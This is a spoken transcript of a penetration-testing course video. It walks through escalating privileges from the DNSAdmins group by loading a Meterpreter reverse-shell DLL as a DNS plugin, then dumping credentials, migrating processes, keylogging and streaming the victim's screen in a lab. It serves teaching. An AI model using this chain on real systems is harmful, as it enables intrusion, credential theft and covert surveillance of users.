Hey, from the future, like right now, go ahead and make a clone or a backup of the machine, snapshot, whatever you want to do before conducting this next exploit. And this is just so if you want to continue playing around with this exploit after the class, continue to try different things, then that this exploit won't mess it up. This is a DNSAdmins exploit. It will mess up the machine as you restart it and things like that. So just go ahead and make a clone or a backup or whatever else you want to do, or you can just download another one after this. But yeah, easiest thing I think would be just to make a full clone of the machine at this time. So the last one that we're going to be looking at for privileges, just straight up like what group privilege you belong to, because we'll also be looking at SE impersonate, is DNSAdmins. All right, so if I go ahead and do a who am I/all, we can see that I have DNSAdmins right here. All right, and we can go ahead and we can do whatever we want with that DNSAdmin. All right, so with DNSAdmins, what we can do is we can pretty much tell where it's going to load the DNS information from. Okay, so we can make a DLL file for server level plugin, and we can change that file, or we can make that file malicious, and then tell DNS to pull its configurations from that server level plugin file, and then stop it, restart it, and we should get information back. So this one's going to go a little bit deeper than just DNS. We're also going to be looking at was it Metasploit, because we'll be putting a Metasploit payload on here. So what we want to do, since this isn't a class on bypassing antivirus, what we're going to go ahead and do is we are going to type in, let's see here, um, virus and threat protection, right? And manage settings. We're going to go ahead and turn off that real-time protection. Yes, okay. And next thing we're going to do is we're going to hop over into Kali, and we need to make that file first, that server level plugin. So we can go ahead, we can clear this out, we can exit out of here. If it decides to, yep, there we go. Always takes a little second to do everything. So we do an MSF Venom. Oh, MSF Venom. All right. And we can throw something like this at, right? So what's going on here is we have a payload here. Okay, it's going to be a Windows payload. We're going to use Meterpreter, all right? And we're going to set up a reverse HTTPS shell. Okay, our L host is going to be this 192.168.0.186. That's me. Our L port, what we're going to list on, 4443. Since we're using Meterpreter payload, what we're going to do is MSF console TAC-Q to open up Metasploit. You don't have to put in that TAC-Q, that just hides the banner. That's all that does. If you want to see the banner really that badly, you can also type in banner. We'll go ahead and we'll hit enter like right here, because that is my L host, and that's what port we're going to listen on for this guy. All right, and went ahead and created that file. All right, we can also say x64. This one's using x86 payload. But let's say if we wanted to, we could also say Windows x64. All right, Meterpreter reverse HTTPS. Okay. We also have staged versus stageless payloads within Metasploit and MSF Venom. So this is a staged payload. We know this because of the slash like right here. If this was an underscore, so we could also do an underscore here, as we can see, right? Something like that, right? Or something like this, like right here, okay? So we can also do an underscore there. However, whoops, Windows x64, Meterpreter, reverse HTTPS. There we go. All right, so we can, a staged payload means that it's going to send part of the payload off, and then it's going to reach back to me again and grab the rest of the payload. A stageless payload just means it's going to send it all at once. Reverse here, what that means is that the machine is going to call back to me, right? So it's going to call back to me, and it's going to open up a port on its side, call back to me on my L port and say, hey, can I talk to you on this L port? My machine's going to say yes, obviously. A bind payload means that I want that machine to open a port, and I'm going to connect to that port. Right? It's easier to get a reverse shell than it is to get a bind shell, because Defender's more likely to stop a bind shell than it is a reverse shell. All right? Since we're using HTTPS here, we're also trying to hide that information, right? We're trying to make it so it's using SSL, and you're not going to be able to see it. All right. So another thing is on L ports, this one's 4443, but we can make it 445 or whatever we want to. Okay, we can make it something different, right? Something that we know can talk back to us. I'm actually just going to enter here. Now we have an x64 payload, but we actually know that it can talk back to us, right? So port 445, port 443, port, different ports that we know can reach out and talk to somebody. So let's go ahead and over here we're going to say use exploit multi-handler. All right, exploit multi-handler is pretty much, it's netcat built into Metasploit. We can look at it like that. Now we have to set our payloads, the same thing we have above. So set payload, right, to right here. We can set our L host to 192.168.0.186. We can also set an L host to Ethernet 0. We could also say something like that too, or tunnel or whatever else. All right, we can also set our L port to 4443, same thing that we have above. And this is ready to now listen. So if we go to show options, we can see that we now have everything that it needs to listen, right, for this type of payload. Now, if you're building MSF Venom and you're trying to build a payload and you don't remember what arguments it needs, such as an L host and L port, you can just open it up on Metasploit, right, and then open it up within multi-handler, that payload type, and then see what does it need? What information do I need to give it? Okay, so let's go ahead and we are going to do a quick run or exploit, right, whatever you want to use there. And we built this file now. Now all we need to do is get this file over to the other machine. We've done this before. We can do an SMB server, right? We can call it share1, okay? And we'll go ahead and hop over here. And we're just going to say copy from, I always forget which way the slashes go, so it's the opposite way of HTTP, 192.168.0.186 /share1 /server level plugin.dll. And we can put that right here. Now if I do a dir, we can see that we have it. Now remember the last video that we talked about, whenever we talked about copying things over, a couple videos ago there, we had to utilize the username and the password, right? Or else it wouldn't allow us to come over. All right. So we could have also done that through EvilWinRM. We could have uploaded it, right? We could have also done that through was it a Python server or any other way we want to do it. So now we have the server level plugin. Let's go ahead and we'll head back over to our notes here, and we're just going to use the DNS command. Okay, within your PDF, it actually shows you how to do it through EvilWinRM, this exact thing. Okay, now we're going to do C student, and ours is actually on desktop here. There we go, server level plugin DNS.dll. We can see that we're telling DNS on its local host and to change the config for server level plugin to load from here. All right, that completes successfully. Registry successfully reset. Awesome. All right, so now from here, we just need to stop and start DNS. So let's go head over to command prompt. Who am I? Just to make sure that everything came over appropriately. /all. We are still a DNSAdmin, correct? There it is, like right there. Boom. Okay. And now that we have that, we can go ahead and we can just stop and start DNS. We could do this from PowerShell with a command /c, but we say sc stop DNS, sc start DNS, and what we should get, it's got to start pending, it has stop pending. Before you do this also, hopefully you didn't do this yet, but before you do this, I would highly suggest you save the machine. All right, because you are going to jack up the machine. Every single time this machine starts up, it is going to make a callback. So if you're trying to do anything else with DNS, not anymore. All right. That's like one of those videos where it says, see that black cable? And then the person pulls it off. They're like, don't pull it off. And then once they go plug it back in, like, and if you pulled it off, don't plug it in. You're like, oh, yeah. I pretty much just pulled that one. So maybe I'll make a little thing at the very beginning of this to say, save the machine. All right. Now we got this interpreter. We do a get UID. Now interpreter is a command and control. All right. So it's obviously not as fancy as Cobalt Strike or something like that. But it's kind of like, like Sliver or something, where it's command and control. We can press question mark, and we can get different things, right? We can do a hash jump, get system, okay? So attempt to elevate your privileges of that local system. We already have that. We can record the microphone, webcam chat. We can start up a key scan, okay? So we can log the keys that they're typing in, things like that, right? What else we could do is we can also see what we're using. Like we can move over to another process. Okay, that's what I'm trying to say there. All right, so we can move over to another process, things like that. So if we were to move over maybe to the Explorer process or something, that's more likely to not restart than our process here, right? So we do want to try to move processes, things like that. I've not used Metasploit in a long time. Which I'm sure that if you're taking this and you're getting ready for like OSCP or something like that, you're trying not to use Metasploit, but you are allowed to use exploit multi-handler. Don't think you're allowed to use a interpreter shell. I don't remember, so don't take that for what it is. But we can see that we can do a lot of different things in here, right? Something else we can do is we can do load Kiwi. And then I'll go ahead and load that extension Kiwi. Okay, then we could do a question mark again. We can see that we now have more things, right? So we could do creds all. Let's try that. All right, there we go. Okay, we got some creds in here. We got student creds, so not much, not anything that we didn't already know, right? That's okay. Let's go ahead and we could do a SAM dump. We could do a secrets dump, just like we have before. So let's go ahead and grab that. Control-Shift-V. All right, I'll say dump SAM. Okay. Let's try dump secret. All right. Sometimes with secrets dump, you actually get the plain text passwords. That's nice. Okay, we do see the NT hashes in there. So yeah, we can just kind of go through and just try different things on here and see what we can actually do with it, right? We're already systems, so we're not going to use get system. All right. I'm trying to remember how to actually go and change what process I'm using. I'm trying to remember that one like right there. As soon as this video is done, I'll remember it. What's pivot? Manage pivot listeners. Oh, that's nice. Is that one new? If anyone knows that one's new, let me know. I just don't remember that one like right there. That's all. But obviously I don't remember a lot of things in this thing. But let's say we want to get on the actual machine itself. We go migrate. There we go. So we can say migrate. Right? And it needs a PID. Okay, so we need to do a PS and we need to know what is actually running on this machine first. All right, that's awesome. So once we type in that PS, and we can go ahead and we can try to find Explorer or something like that, right? Spool service is a good one also. That won't get shut down. And also notice what it's actually running as, right? So we can see that this is running as system, this is running as local service, network service. So if we were to go over into this process ID like right here, we are now going to become that, right? As long as we're able to get over to it. Okay, I'm trying to find Explorer in here, just so we can look at like key scans and stuff like that. But I don't seem to be finding it. We should see it, but I just don't seem to be finding it in here for Explorer.exe, which you guys probably saw it in the video and you're yelling at it like Blue's Clues like right now. Like I'm actually going to be able to hear you. So, all right, not seeing it in here, Explorer.exe. I don't think I can grep for this guy also. I'm sure if I sat here all day and looked at it, I'd probably find it. But not seeing it in here right there. I'm thinking I want to try to get to something that I know will continue running. We could try a key scan. Usually I like to key scan start. Usually I like to actually bring it over to Explorer because I know it's going to get those key scans. So there we go. Okay, so we got that key scan start. It's starting to sniff keystroke sniffer. Okay, so let's go ahead and let's hop back over into our machine over here and see if we start typing things. Who am I /all. Okay, let's open up Notepad. Test. This is a test. 1, 2, 3. All right. I don't know if it's actually going to do it or not if I'm not in Explorer, but we'll go ahead and we'll give it a try. So let's go ahead and do a key scan dump. Dumping capture keystrokes. Okay, it's not skiing anything, right? We can do a key scan stop. I think because I'm not an Explorer, so it's trying to pick up keystrokes from where I am, like right now within that process that I'm in. Let's go back to dump. Yeah, there's nothing there, obviously. Don't stop it before you're done. Also, okay, that's another thing. Do not stop the key scan before you're done. You want to do a dump and then stop it, or else you're not going to be able to see anything. So if you do find Explorer.exe on yours, then you'll be able to dump those keystrokes. I don't know if it's actually even called. Oh, there it is. There we go. 3720. So let's go ahead and we're going to migrate over into 3720. Awesome. All right, we successfully migrated. So now we're using a different process, right? So let's go ahead and say do a quick get UID again because that's going to show us who we are. All right, we're Cyber Rage's student. Okay. We can go ahead and we can say shell. And we can actually get a shell on here. So we can say who am I / all. Nope. The back key, some of the keys don't function like you're used to. All right, awesome. Okay, we can go ahead and exit out here, or we can Control Z it to background it. If you want to background this, Control Z, yes, enter, and then do a sessions, enter, and then sessions 1. Right, then we hop back into it. All right, so we did that get UID. We now migrated over. All right, so now let's go ahead and let's do a key scan start. And we can start that keystroke sniffer like right there. And let's hop back over to here. And we'll go back into Notepad and just say this is a new test, 1, 2, 3, hiya. And let's go ahead and hop back over into Kali now. And we will say key scan dump. And then there we go. Okay, we can see like right there, we press the backspace. Then we said this is the new test, 1, 2, 3, hiya. Okay, so we can see things like that, right? If I were to put my, what is it? Let's see here. VM, I'm going to go ahead and throw my camera onto this one. Removable devices. I think it's that guy like right there. Disconnect from host. There we go. USB device about to be unplugged from your host and connect to the virtual machine. Okay. So we now have that camera like right there up and running. Don't know if it's actually going to show up or not just because of how I have OBS going. But we'll go ahead and we'll give it a try. Let's go ahead and question mark there. And we can try to see, can we actually see that camera, right? So we say maybe webcam stream, play a video stream from the specified webcam. So let's try that. Webcam list first. All right, there we go. Webcam stream. Don't know if I need more information in there. All right, it's waiting, it's trying, but it didn't look like it was actually going to grab onto it, did it? Because if I hop back over to here, it says that operation failed. Let's go ahead and try this. Let's go ahead and do a get system because we are like right now the student, right? So let's go ahead and do a get system there. And it's not able to grab that get system. That's okay. Let's see if anything's happened yet. Or this is still going insane. It still is going insane. All right. We could also attempt to get the desktop too. Let's see what that looks like. We can also try to stream the desktop and things like that. All right. So session 2, it says. So, but there's a bunch of stuff in here that we could try to do and commands that could run and things like that. So pretty good stuff, right? We can set mouse events, screen share, watch the remote user screen in real time. We can try that. Some of the things won't work. Some things will. You just got to kind of go through, just try. There we go. There's our screen like right there, right? The webcam one, I think that's because I'm using OBS and everything else. It's probably trying to take it away from there. And it's probably trying to do a bunch of stuff. But there we go with that one. So we can see that this is pretty dangerous, like right here. We could also, once we have this, we can also look for exploits. So we can Control Z, yes. And we can also pivot, okay? So we can look for exploits and we can also pivot. So we can actually search for, let's say, let's see here, Windows, right? Or post Windows or anything like that, right? Or search for Windows post, I believe it is. All right. Nope, not that one, like right there. But we can search for different exploits within it to be able to continue to look through Metasploit here. But a bunch of different Windows exploits on here. But we could try to actually increase our privileges here with different Windows payloads, right? So if it's an older machine, we could attempt to send different exploits at it that allow us to privesc. All right, let's go ahead and hop back over into the machine again. Sessions 1, I believe it was. There we go. Get UID just to make sure. Yep, we're good. Okay, cool. So there's a bunch of different things that we can try to do. We could search for post. I thought there was a Windows post, but I forget like where it's at. We'll probably just have a whole class on Metasploit once I get back into it and use it again. Like I said, I've not used it in a very long time. I just wanted to showcase it in this video just so you could all see how it actually works, things like that, and start to play around with it. So hopefully you all learned something. I'll make a video on just Metasploit itself, and we'll go through from there. All right, you all have a good one. I'll talk to you all later.